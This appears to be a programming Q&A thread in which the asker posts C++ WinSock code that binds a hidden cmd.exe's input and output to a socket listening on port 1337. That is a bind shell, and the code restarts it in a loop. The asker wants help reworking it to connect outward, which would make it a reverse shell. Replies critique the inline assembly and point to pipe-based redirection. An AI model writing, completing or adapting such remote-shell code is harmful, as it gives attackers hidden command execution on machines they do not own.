# StdIn / StdOut / StdErr redirection to WinSock connection

Tags: c++, sockets, networking, winsock

I've been trying to redirect the input and output of cmd.exe for quite some time now, and while i've figured out how to do it in c#, i'm still oblivious on how to properly implement it in c++. 
The furthest i've gotten were with `popen()` which seems to reopen the process everytime i pass a command to it, resulting in the inability to use commands like cd, and with the following serverside function which i've been unable to port to clientside:

```
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <iostream>

using namespace std;


void ServerStart()
{
    WSADATA wsa;

    SOCKET s;
    SOCKADDR_IN sAddr;

    USHORT port;

    PROCESS_INFORMATION pi;
    STARTUPINFO si;

    port = 1337;//Set listening port

    memset( &si, 0, sizeof( si ) );
    si.cb = sizeof( si );
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;

    sAddr.sin_addr.s_addr = INADDR_ANY;
    sAddr.sin_port =  (port >> 8) | (port << 8);
    sAddr.sin_family = AF_INET;

    WSAStartup( 0x0202, &wsa );

    s = WSASocket( AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0 );
    bind( s, (LPSOCKADDR)&sAddr, sizeof( sAddr ) );
    listen( s, 5 );

    __asm
    {
        push ebx
        mov ebx, s
    }
    s = accept( s, NULL, NULL );//Accept Client
    __asm
    {
        push ebx
        call DWORD PTR [closesocket]//Close if error.
        pop ebx
    }

    si.hStdInput = (HANDLE)s;
    si.hStdOutput = (HANDLE)s;
    si.hStdError = (HANDLE)s;

    CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi );//Start the remote process

    WaitForSingleObject( pi.hProcess, INFINITE );//Allow Client to control remote process

    CloseHandle( pi.hProcess );
    CloseHandle( pi.hThread );
    closesocket( s );

    WSACleanup();
    ServerStart();//Server Start Loop
}
```

I'd appreciate any help or advice on how to do the same as the above without the listening part. Thanks in advance :)

Comment: Your `__asm` blocks are unnecessary. Instead of saving  the original `SOCKET` to EBX just so you can overwrite it, you should be using a second `SOCKET` variable instead. Don't mix C/C++ and assembly unless you *really* need it, and this is not one of those times where it is needed.

Answer (score 0, accepted):

You cannot use WinSock socket handles directly for stdin/out/err redirection.  Use pipes from `CreatePipe()` instead. You will have to write extra code that

- reads inbound data from the socket and writes it to the stdin pipe
- reads data from the stdout/err pipes and writes it to the socket.

MSDN has an example of using pipes for the redirection:

[Creating a Child Process with Redirected Input and Output](https://msdn.microsoft.com/en-us/library/windows/desktop/ms682499(v=vs.85).aspx)